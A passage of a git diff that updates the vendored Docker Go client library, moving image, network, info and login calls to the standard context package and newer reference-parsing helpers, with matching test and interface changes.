 // ImagePull requests the docker host to pull an image from a remote registry.
@@ -19,16 +19,19 @@ import (
 // FIXME(vdemeester): there is currently used in a few way in docker/docker
 // - if not in trusted content, ref is used to pass the whole reference, and tag is empty
 // - if in trusted content, ref is used to pass the reference name, and tag for the digest
-func (cli *Client) ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error) {
-	repository, tag, err := reference.Parse(ref)
+func (cli *Client) ImagePull(ctx context.Context, refStr string, options types.ImagePullOptions) (io.ReadCloser, error) {
+	ref, err := reference.ParseNormalizedNamed(refStr)
 	if err != nil {
 		return nil, err
 	}
 
 	query := url.Values{}
-	query.Set("fromImage", repository)
-	if tag != "" && !options.All {
-		query.Set("tag", tag)
+	query.Set("fromImage", reference.FamiliarName(ref))
+	if !options.All {
+		query.Set("tag", getAPITagFromNamedRef(ref))
+	}
+	if options.Platform != "" {
+		query.Set("platform", strings.ToLower(options.Platform))
 	}
 
 	resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth)
@@ -44,3 +47,18 @@ func (cli *Client) ImagePull(ctx context.Context, ref string, options types.Imag
 	}
 	return resp.body, nil
 }
+
+// getAPITagFromNamedRef returns a tag from the specified reference.
+// This function is necessary as long as the docker "server" api expects
+// digests to be sent as tags and makes a distinction between the name
+// and tag/digest part of a reference.
+func getAPITagFromNamedRef(ref reference.Named) string {
+	if digested, ok := ref.(reference.Digested); ok {
+		return digested.Digest().String()
+	}
+	ref = reference.TagNameOnly(ref)
+	if tagged, ok := ref.(reference.Tagged); ok {
+		return tagged.Tag()
+	}
+	return ""
+}
diff --git a/vendor/github.com/docker/docker/client/image_pull_test.go b/vendor/github.com/docker/docker/client/image_pull_test.go
index fe6bafed97..361c5c2be3 100644
--- a/vendor/github.com/docker/docker/client/image_pull_test.go
+++ b/vendor/github.com/docker/docker/client/image_pull_test.go
@@ -1,15 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 )
 
@@ -21,7 +20,7 @@ func TestImagePullReferenceParseError(t *testing.T) {
 	}
 	// An empty reference is an invalid reference
 	_, err := client.ImagePull(context.Background(), "", types.ImagePullOptions{})
-	if err == nil || err.Error() != "repository name must have at least one component" {
+	if err == nil || !strings.Contains(err.Error(), "invalid reference format") {
 		t.Fatalf("expected an error, got %v", err)
 	}
 }
diff --git a/vendor/github.com/docker/docker/client/image_push.go b/vendor/github.com/docker/docker/client/image_push.go
index 8e73d28f56..a15871c2b4 100644
--- a/vendor/github.com/docker/docker/client/image_push.go
+++ b/vendor/github.com/docker/docker/client/image_push.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"errors"
 	"io"
 	"net/http"
 	"net/url"
 
-	"golang.org/x/net/context"
-
-	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 )
 
@@ -16,31 +15,33 @@ import (
 // It executes the privileged function if the operation is unauthorized
 // and it tries one more time.
 // It's up to the caller to handle the io.ReadCloser and close it properly.
-func (cli *Client) ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error) {
-	distributionRef, err := distreference.ParseNamed(ref)
+func (cli *Client) ImagePush(ctx context.Context, image string, options types.ImagePushOptions) (io.ReadCloser, error) {
+	ref, err := reference.ParseNormalizedNamed(image)
 	if err != nil {
 		return nil, err
 	}
 
-	if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical {
+	if _, isCanonical := ref.(reference.Canonical); isCanonical {
 		return nil, errors.New("cannot push a digest reference")
 	}
 
-	var tag = ""
-	if nameTaggedRef, isNamedTagged := distributionRef.(distreference.NamedTagged); isNamedTagged {
+	tag := ""
+	name := reference.FamiliarName(ref)
+
+	if nameTaggedRef, isNamedTagged := ref.(reference.NamedTagged); isNamedTagged {
 		tag = nameTaggedRef.Tag()
 	}
 
 	query := url.Values{}
 	query.Set("tag", tag)
 
-	resp, err := cli.tryImagePush(ctx, distributionRef.Name(), query, options.RegistryAuth)
+	resp, err := cli.tryImagePush(ctx, name, query, options.RegistryAuth)
 	if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil {
 		newAuthHeader, privilegeErr := options.PrivilegeFunc()
 		if privilegeErr != nil {
 			return nil, privilegeErr
 		}
-		resp, err = cli.tryImagePush(ctx, distributionRef.Name(), query, newAuthHeader)
+		resp, err = cli.tryImagePush(ctx, name, query, newAuthHeader)
 	}
 	if err != nil {
 		return nil, err
diff --git a/vendor/github.com/docker/docker/client/image_push_test.go b/vendor/github.com/docker/docker/client/image_push_test.go
index b52da8b8dc..0693601af1 100644
--- a/vendor/github.com/docker/docker/client/image_push_test.go
+++ b/vendor/github.com/docker/docker/client/image_push_test.go
@@ -1,15 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 )
 
@@ -21,7 +20,7 @@ func TestImagePushReferenceError(t *testing.T) {
 	}
 	// An empty reference is an invalid reference
 	_, err := client.ImagePush(context.Background(), "", types.ImagePushOptions{})
-	if err == nil || err.Error() != "repository name must have at least one component" {
+	if err == nil || !strings.Contains(err.Error(), "invalid reference format") {
 		t.Fatalf("expected an error, got %v", err)
 	}
 	// An canonical reference cannot be pushed
diff --git a/vendor/github.com/docker/docker/client/image_remove.go b/vendor/github.com/docker/docker/client/image_remove.go
index 839e5311c4..45d6e6f0db 100644
--- a/vendor/github.com/docker/docker/client/image_remove.go
+++ b/vendor/github.com/docker/docker/client/image_remove.go
@@ -1,15 +1,15 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // ImageRemove removes an image from the docker host.
-func (cli *Client) ImageRemove(ctx context.Context, imageID string, options types.ImageRemoveOptions) ([]types.ImageDelete, error) {
+func (cli *Client) ImageRemove(ctx context.Context, imageID string, options types.ImageRemoveOptions) ([]types.ImageDeleteResponseItem, error) {
 	query := url.Values{}
 
 	if options.Force {
@@ -19,12 +19,12 @@ func (cli *Client) ImageRemove(ctx context.Context, imageID string, options type
 		query.Set("noprune", "1")
 	}
 
+	var dels []types.ImageDeleteResponseItem
 	resp, err := cli.delete(ctx, "/images/"+imageID, query, nil)
 	if err != nil {
-		return nil, err
+		return dels, wrapResponseError(err, resp, "image", imageID)
 	}
 
-	var dels []types.ImageDelete
 	err = json.NewDecoder(resp.body).Decode(&dels)
 	ensureReaderClosed(resp)
 	return dels, err
diff --git a/vendor/github.com/docker/docker/client/image_remove_test.go b/vendor/github.com/docker/docker/client/image_remove_test.go
index 7b004f70e6..acc6bc9177 100644
--- a/vendor/github.com/docker/docker/client/image_remove_test.go
+++ b/vendor/github.com/docker/docker/client/image_remove_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,8 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestImageRemoveError(t *testing.T) {
@@ -19,9 +21,17 @@ func TestImageRemoveError(t *testing.T) {
 	}
 
 	_, err := client.ImageRemove(context.Background(), "image_id", types.ImageRemoveOptions{})
-	if err == nil || err.Error() != "Error response from daemon: Server error" {
-		t.Fatalf("expected a Server Error, got %v", err)
+	assert.Check(t, is.Error(err, "Error response from daemon: Server error"))
+}
+
+func TestImageRemoveImageNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "missing")),
 	}
+
+	_, err := client.ImageRemove(context.Background(), "unknown", types.ImageRemoveOptions{})
+	assert.Check(t, is.Error(err, "Error: No such image: unknown"))
+	assert.Check(t, IsErrNotFound(err))
 }
 
 func TestImageRemove(t *testing.T) {
@@ -63,7 +73,7 @@ func TestImageRemove(t *testing.T) {
 						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
 					}
 				}
-				b, err := json.Marshal([]types.ImageDelete{
+				b, err := json.Marshal([]types.ImageDeleteResponseItem{
 					{
 						Untagged: "image_id1",
 					},
diff --git a/vendor/github.com/docker/docker/client/image_save.go b/vendor/github.com/docker/docker/client/image_save.go
index ecac880a32..d1314e4b22 100644
--- a/vendor/github.com/docker/docker/client/image_save.go
+++ b/vendor/github.com/docker/docker/client/image_save.go
@@ -1,10 +1,9 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
 	"net/url"
-
-	"golang.org/x/net/context"
 )
 
 // ImageSave retrieves one or more images from the docker host as an io.ReadCloser.
diff --git a/vendor/github.com/docker/docker/client/image_save_test.go b/vendor/github.com/docker/docker/client/image_save_test.go
index 8f0cf88640..a40055e583 100644
--- a/vendor/github.com/docker/docker/client/image_save_test.go
+++ b/vendor/github.com/docker/docker/client/image_save_test.go
@@ -1,16 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"reflect"
-	"testing"
-
-	"golang.org/x/net/context"
-
 	"strings"
+	"testing"
 )
 
 func TestImageSaveError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/image_search.go b/vendor/github.com/docker/docker/client/image_search.go
index b0fcd5c23d..176de3c582 100644
--- a/vendor/github.com/docker/docker/client/image_search.go
+++ b/vendor/github.com/docker/docker/client/image_search.go
@@ -1,6 +1,7 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"net/http"
@@ -9,7 +10,6 @@ import (
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/registry"
-	"golang.org/x/net/context"
 )
 
 // ImageSearch makes the docker host to search by a term in a remote registry.
@@ -21,7 +21,7 @@ func (cli *Client) ImageSearch(ctx context.Context, term string, options types.I
 	query.Set("limit", fmt.Sprintf("%d", options.Limit))
 
 	if options.Filters.Len() > 0 {
-		filterJSON, err := filters.ToParam(options.Filters)
+		filterJSON, err := filters.ToJSON(options.Filters)
 		if err != nil {
 			return results, err
 		}
diff --git a/vendor/github.com/docker/docker/client/image_search_test.go b/vendor/github.com/docker/docker/client/image_search_test.go
index b17bbd8343..1456cd606f 100644
--- a/vendor/github.com/docker/docker/client/image_search_test.go
+++ b/vendor/github.com/docker/docker/client/image_search_test.go
@@ -1,16 +1,15 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
+	"encoding/json"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
-	"encoding/json"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/registry"
diff --git a/vendor/github.com/docker/docker/client/image_tag.go b/vendor/github.com/docker/docker/client/image_tag.go
index bdbf94add2..5652bfc252 100644
--- a/vendor/github.com/docker/docker/client/image_tag.go
+++ b/vendor/github.com/docker/docker/client/image_tag.go
@@ -1,34 +1,37 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
-	"errors"
-	"fmt"
+	"context"
 	"net/url"
 
-	"golang.org/x/net/context"
-
-	distreference "github.com/docker/distribution/reference"
-	"github.com/docker/docker/api/types/reference"
+	"github.com/docker/distribution/reference"
+	"github.com/pkg/errors"
 )
 
 // ImageTag tags an image in the docker host
-func (cli *Client) ImageTag(ctx context.Context, imageID, ref string) error {
-	distributionRef, err := distreference.ParseNamed(ref)
+func (cli *Client) ImageTag(ctx context.Context, source, target string) error {
+	if _, err := reference.ParseAnyReference(source); err != nil {
+		return errors.Wrapf(err, "Error parsing reference: %q is not a valid repository/tag", source)
+	}
+
+	ref, err := reference.ParseNormalizedNamed(target)
 	if err != nil {
-		return fmt.Errorf("Error parsing reference: %q is not a valid repository/tag", ref)
+		return errors.Wrapf(err, "Error parsing reference: %q is not a valid repository/tag", target)
 	}
 
-	if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical {
+	if _, isCanonical := ref.(reference.Canonical); isCanonical {
 		return errors.New("refusing to create a tag with a digest reference")
 	}
 
-	tag := reference.GetTagFromNamedRef(distributionRef)
+	ref = reference.TagNameOnly(ref)
 
 	query := url.Values{}
-	query.Set("repo", distributionRef.Name())
-	query.Set("tag", tag)
+	query.Set("repo", reference.FamiliarName(ref))
+	if tagged, ok := ref.(reference.Tagged); ok {
+		query.Set("tag", tagged.Tag())
+	}
 
-	resp, err := cli.post(ctx, "/images/"+imageID+"/tag", query, nil, nil)
+	resp, err := cli.post(ctx, "/images/"+source+"/tag", query, nil, nil)
 	ensureReaderClosed(resp)
 	return err
 }
diff --git a/vendor/github.com/docker/docker/client/image_tag_test.go b/vendor/github.com/docker/docker/client/image_tag_test.go
index 7925db9f1b..2923bb995b 100644
--- a/vendor/github.com/docker/docker/client/image_tag_test.go
+++ b/vendor/github.com/docker/docker/client/image_tag_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestImageTagError(t *testing.T) {
@@ -22,7 +21,7 @@ func TestImageTagError(t *testing.T) {
 	}
 }
 
-// Note: this is not testing all the InvalidReference as it's the reponsability
+// Note: this is not testing all the InvalidReference as it's the responsibility
 // of distribution/reference package.
 func TestImageTagInvalidReference(t *testing.T) {
 	client := &Client{
@@ -30,11 +29,33 @@ func TestImageTagInvalidReference(t *testing.T) {
 	}
 
 	err := client.ImageTag(context.Background(), "image_id", "aa/asdf$$^/aa")
-	if err == nil || err.Error() != `Error parsing reference: "aa/asdf$$^/aa" is not a valid repository/tag` {
+	if err == nil || err.Error() != `Error parsing reference: "aa/asdf$$^/aa" is not a valid repository/tag: invalid reference format` {
 		t.Fatalf("expected ErrReferenceInvalidFormat, got %v", err)
 	}
 }
 
+func TestImageTagInvalidSourceImageName(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.ImageTag(context.Background(), "invalid_source_image_name_", "repo:tag")
+	if err == nil || err.Error() != "Error parsing reference: \"invalid_source_image_name_\" is not a valid repository/tag: invalid reference format" {
+		t.Fatalf("expected Parsing Reference Error, got %v", err)
+	}
+}
+
+func TestImageTagHexSource(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusOK, "OK")),
+	}
+
+	err := client.ImageTag(context.Background(), "0d409d33b27e47423b049f7f863faa08655a8c901749c2b25b93ca67d01a470d", "repo:tag")
+	if err != nil {
+		t.Fatalf("got error: %v", err)
+	}
+}
+
 func TestImageTag(t *testing.T) {
 	expectedURL := "/images/image_id/tag"
 	tagCases := []struct {
diff --git a/vendor/github.com/docker/docker/client/info.go b/vendor/github.com/docker/docker/client/info.go
index ac07961224..121f256ab1 100644
--- a/vendor/github.com/docker/docker/client/info.go
+++ b/vendor/github.com/docker/docker/client/info.go
@@ -1,12 +1,12 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // Info returns information about the docker server.
diff --git a/vendor/github.com/docker/docker/client/info_test.go b/vendor/github.com/docker/docker/client/info_test.go
index 79f23c8af2..866d8e8849 100644
--- a/vendor/github.com/docker/docker/client/info_test.go
+++ b/vendor/github.com/docker/docker/client/info_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func TestInfoServerError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/interface.go b/vendor/github.com/docker/docker/client/interface.go
index 05978039b7..9250c468a6 100644
--- a/vendor/github.com/docker/docker/client/interface.go
+++ b/vendor/github.com/docker/docker/client/interface.go
@@ -1,23 +1,28 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
+	"net"
+	"net/http"
 	"time"
 
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/container"
+	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/events"
 	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/api/types/image"
+	networktypes "github.com/docker/docker/api/types/network"
 	"github.com/docker/docker/api/types/registry"
 	"github.com/docker/docker/api/types/swarm"
 	volumetypes "github.com/docker/docker/api/types/volume"
-	"golang.org/x/net/context"
 )
 
 // CommonAPIClient is the common methods between stable and experimental versions of APIClient.
 type CommonAPIClient interface {
+	ConfigAPIClient
 	ContainerAPIClient
+	DistributionAPIClient
 	ImageAPIClient
 	NodeAPIClient
 	NetworkAPIClient
@@ -28,17 +33,22 @@ type CommonAPIClient interface {
 	SystemAPIClient
 	VolumeAPIClient
 	ClientVersion() string
+	DaemonHost() string
+	HTTPClient() *http.Client
 	ServerVersion(ctx context.Context) (types.Version, error)
-	UpdateClientVersion(v string)
+	NegotiateAPIVersion(ctx context.Context)
+	NegotiateAPIVersionPing(types.Ping)
+	DialSession(ctx context.Context, proto string, meta map[string][]string) (net.Conn, error)
+	Close() error
 }
 
 // ContainerAPIClient defines API client methods for the containers
 type ContainerAPIClient interface {
 	ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error)
 	ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error)
-	ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, containerName string) (container.ContainerCreateCreatedBody, error)
-	ContainerDiff(ctx context.Context, container string) ([]types.ContainerChange, error)
-	ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error)
+	ContainerCreate(ctx context.Context, config *containertypes.Config, hostConfig *containertypes.HostConfig, networkingConfig *networktypes.NetworkingConfig, containerName string) (containertypes.ContainerCreateCreatedBody, error)
+	ContainerDiff(ctx context.Context, container string) ([]containertypes.ContainerChangeResponseItem, error)
+	ContainerExecAttach(ctx context.Context, execID string, config types.ExecStartCheck) (types.HijackedResponse, error)
 	ContainerExecCreate(ctx context.Context, container string, config types.ExecConfig) (types.IDResponse, error)
 	ContainerExecInspect(ctx context.Context, execID string) (types.ContainerExecInspect, error)
 	ContainerExecResize(ctx context.Context, execID string, options types.ResizeOptions) error
@@ -58,27 +68,34 @@ type ContainerAPIClient interface {
 	ContainerStats(ctx context.Context, container string, stream bool) (types.ContainerStats, error)
 	ContainerStart(ctx context.Context, container string, options types.ContainerStartOptions) error
 	ContainerStop(ctx context.Context, container string, timeout *time.Duration) error
-	ContainerTop(ctx context.Context, container string, arguments []string) (types.ContainerProcessList, error)
+	ContainerTop(ctx context.Context, container string, arguments []string) (containertypes.ContainerTopOKBody, error)
 	ContainerUnpause(ctx context.Context, container string) error
-	ContainerUpdate(ctx context.Context, container string, updateConfig container.UpdateConfig) (container.ContainerUpdateOKBody, error)
-	ContainerWait(ctx context.Context, container string) (int64, error)
+	ContainerUpdate(ctx context.Context, container string, updateConfig containertypes.UpdateConfig) (containertypes.ContainerUpdateOKBody, error)
+	ContainerWait(ctx context.Context, container string, condition containertypes.WaitCondition) (<-chan containertypes.ContainerWaitOKBody, <-chan error)
 	CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error)
 	CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error
 	ContainersPrune(ctx context.Context, pruneFilters filters.Args) (types.ContainersPruneReport, error)
 }
 
+// DistributionAPIClient defines API client methods for the registry
+type DistributionAPIClient interface {
+	DistributionInspect(ctx context.Context, image, encodedRegistryAuth string) (registry.DistributionInspect, error)
+}
+
 // ImageAPIClient defines API client methods for the images
 type ImageAPIClient interface {
 	ImageBuild(ctx context.Context, context io.Reader, options types.ImageBuildOptions) (types.ImageBuildResponse, error)
+	BuildCachePrune(ctx context.Context) (*types.BuildCachePruneReport, error)
+	BuildCancel(ctx context.Context, id string) error
 	ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error)
-	ImageHistory(ctx context.Context, image string) ([]types.ImageHistory, error)
+	ImageHistory(ctx context.Context, image string) ([]image.HistoryResponseItem, error)
 	ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error)
 	ImageInspectWithRaw(ctx context.Context, image string) (types.ImageInspect, []byte, error)
 	ImageList(ctx context.Context, options types.ImageListOptions) ([]types.ImageSummary, error)
 	ImageLoad(ctx context.Context, input io.Reader, quiet bool) (types.ImageLoadResponse, error)
 	ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error)
 	ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error)
-	ImageRemove(ctx context.Context, image string, options types.ImageRemoveOptions) ([]types.ImageDelete, error)
+	ImageRemove(ctx context.Context, image string, options types.ImageRemoveOptions) ([]types.ImageDeleteResponseItem, error)
 	ImageSearch(ctx context.Context, term string, options types.ImageSearchOptions) ([]registry.SearchResult, error)
 	ImageSave(ctx context.Context, images []string) (io.ReadCloser, error)
 	ImageTag(ctx context.Context, image, ref string) error
@@ -87,13 +104,13 @@ type ImageAPIClient interface {
 
 // NetworkAPIClient defines API client methods for the networks
 type NetworkAPIClient interface {
-	NetworkConnect(ctx context.Context, networkID, container string, config *network.EndpointSettings) error
+	NetworkConnect(ctx context.Context, network, container string, config *networktypes.EndpointSettings) error
 	NetworkCreate(ctx context.Context, name string, options types.NetworkCreate) (types.NetworkCreateResponse, error)
-	NetworkDisconnect(ctx context.Context, networkID, container string, force bool) error
-	NetworkInspect(ctx context.Context, networkID string) (types.NetworkResource, error)
-	NetworkInspectWithRaw(ctx context.Context, networkID string) (types.NetworkResource, []byte, error)
+	NetworkDisconnect(ctx context.Context, network, container string, force bool) error
+	NetworkInspect(ctx context.Context, network string, options types.NetworkInspectOptions) (types.NetworkResource, error)
+	NetworkInspectWithRaw(ctx context.Context, network string, options types.NetworkInspectOptions) (types.NetworkResource, []byte, error)
 	NetworkList(ctx context.Context, options types.NetworkListOptions) ([]types.NetworkResource, error)
-	NetworkRemove(ctx context.Context, networkID string) error
+	NetworkRemove(ctx context.Context, network string) error
 	NetworksPrune(ctx context.Context, pruneFilter filters.Args) (types.NetworksPruneReport, error)
 }
 
@@ -107,7 +124,7 @@ type NodeAPIClient interface {
 
 // PluginAPIClient defines API client methods for the plugins
 type PluginAPIClient interface {
-	PluginList(ctx context.Context) (types.PluginsListResponse, error)
+	PluginList(ctx context.Context, filter filters.Args) (types.PluginsListResponse, error)
 	PluginRemove(ctx context.Context, name string, options types.PluginRemoveOptions) error
 	PluginEnable(ctx context.Context, name string, options types.PluginEnableOptions) error
 	PluginDisable(ctx context.Context, name string, options types.PluginDisableOptions) error
@@ -122,11 +139,12 @@ type PluginAPIClient interface {
 // ServiceAPIClient defines API client methods for the services
 type ServiceAPIClient interface {
 	ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error)
-	ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error)
+	ServiceInspectWithRaw(ctx context.Context, serviceID string, options types.ServiceInspectOptions) (swarm.Service, []byte, error)
 	ServiceList(ctx context.Context, options types.ServiceListOptions) ([]swarm.Service, error)
 	ServiceRemove(ctx context.Context, serviceID string) error
 	ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error)
 	ServiceLogs(ctx context.Context, serviceID string, options types.ContainerLogsOptions) (io.ReadCloser, error)
+	TaskLogs(ctx context.Context, taskID string, options types.ContainerLogsOptions) (io.ReadCloser, error)
 	TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error)
 	TaskList(ctx context.Context, options types.TaskListOptions) ([]swarm.Task, error)
 }
@@ -153,10 +171,10 @@ type SystemAPIClient interface {
 
 // VolumeAPIClient defines API client methods for the volumes
 type VolumeAPIClient interface {
-	VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error)
+	VolumeCreate(ctx context.Context, options volumetypes.VolumeCreateBody) (types.Volume, error)
 	VolumeInspect(ctx context.Context, volumeID string) (types.Volume, error)
 	VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error)
-	VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error)
+	VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumeListOKBody, error)
 	VolumeRemove(ctx context.Context, volumeID string, force bool) error
 	VolumesPrune(ctx context.Context, pruneFilter filters.Args) (types.VolumesPruneReport, error)
 }
@@ -169,3 +187,12 @@ type SecretAPIClient interface {
 	SecretInspectWithRaw(ctx context.Context, name string) (swarm.Secret, []byte, error)
 	SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error
 }
+
+// ConfigAPIClient defines API client methods for configs
+type ConfigAPIClient interface {
+	ConfigList(ctx context.Context, options types.ConfigListOptions) ([]swarm.Config, error)
+	ConfigCreate(ctx context.Context, config swarm.ConfigSpec) (types.ConfigCreateResponse, error)
+	ConfigRemove(ctx context.Context, id string) error
+	ConfigInspectWithRaw(ctx context.Context, name string) (swarm.Config, []byte, error)
+	ConfigUpdate(ctx context.Context, id string, version swarm.Version, config swarm.ConfigSpec) error
+}
diff --git a/vendor/github.com/docker/docker/client/interface_experimental.go b/vendor/github.com/docker/docker/client/interface_experimental.go
index 51da98ecdd..402ffb512c 100644
--- a/vendor/github.com/docker/docker/client/interface_experimental.go
+++ b/vendor/github.com/docker/docker/client/interface_experimental.go
@@ -1,8 +1,9 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
+
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 type apiClientExperimental interface {
diff --git a/vendor/github.com/docker/docker/client/interface_stable.go b/vendor/github.com/docker/docker/client/interface_stable.go
index cc90a3cbb9..5502cd7426 100644
--- a/vendor/github.com/docker/docker/client/interface_stable.go
+++ b/vendor/github.com/docker/docker/client/interface_stable.go
@@ -1,4 +1,4 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 // APIClient is an interface that clients that talk with a docker server must implement.
 type APIClient interface {
diff --git a/vendor/github.com/docker/docker/client/login.go b/vendor/github.com/docker/docker/client/login.go
index 600dc7196f..7d66181900 100644
--- a/vendor/github.com/docker/docker/client/login.go
+++ b/vendor/github.com/docker/docker/client/login.go
@@ -1,17 +1,17 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/http"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/registry"
-	"golang.org/x/net/context"
 )
 
 // RegistryLogin authenticates the docker server with a given docker registry.
-// It returns UnauthorizerError when the authentication fails.
+// It returns unauthorizedError when the authentication fails.
 func (cli *Client) RegistryLogin(ctx context.Context, auth types.AuthConfig) (registry.AuthenticateOKBody, error) {
 	resp, err := cli.post(ctx, "/auth", url.Values{}, auth, nil)
 
diff --git a/vendor/github.com/docker/docker/client/network_connect.go b/vendor/github.com/docker/docker/client/network_connect.go
index c022c17b5b..5718946134 100644
--- a/vendor/github.com/docker/docker/client/network_connect.go
+++ b/vendor/github.com/docker/docker/client/network_connect.go
@@ -1,9 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
+
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/network"
-	"golang.org/x/net/context"
 )
 
 // NetworkConnect connects a container to an existent network in the docker host.
diff --git a/vendor/github.com/docker/docker/client/network_connect_test.go b/vendor/github.com/docker/docker/client/network_connect_test.go
index d472f4520c..07a3ba692e 100644
--- a/vendor/github.com/docker/docker/client/network_connect_test.go
+++ b/vendor/github.com/docker/docker/client/network_connect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -9,8 +10,6 @@ import (
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/network"
 )
@@ -87,6 +86,10 @@ func TestNetworkConnect(t *testing.T) {
 				return nil, fmt.Errorf("expected 'container_id', got %s", connect.Container)
 			}
 
+			if connect.EndpointConfig == nil {
+				return nil, fmt.Errorf("expected connect.EndpointConfig to be not nil, got %v", connect.EndpointConfig)
+			}
+
 			if connect.EndpointConfig.NetworkID != "NetworkID" {
 				return nil, fmt.Errorf("expected 'NetworkID', got %s", connect.EndpointConfig.NetworkID)
 			}
diff --git a/vendor/github.com/docker/docker/client/network_create.go b/vendor/github.com/docker/docker/client/network_create.go
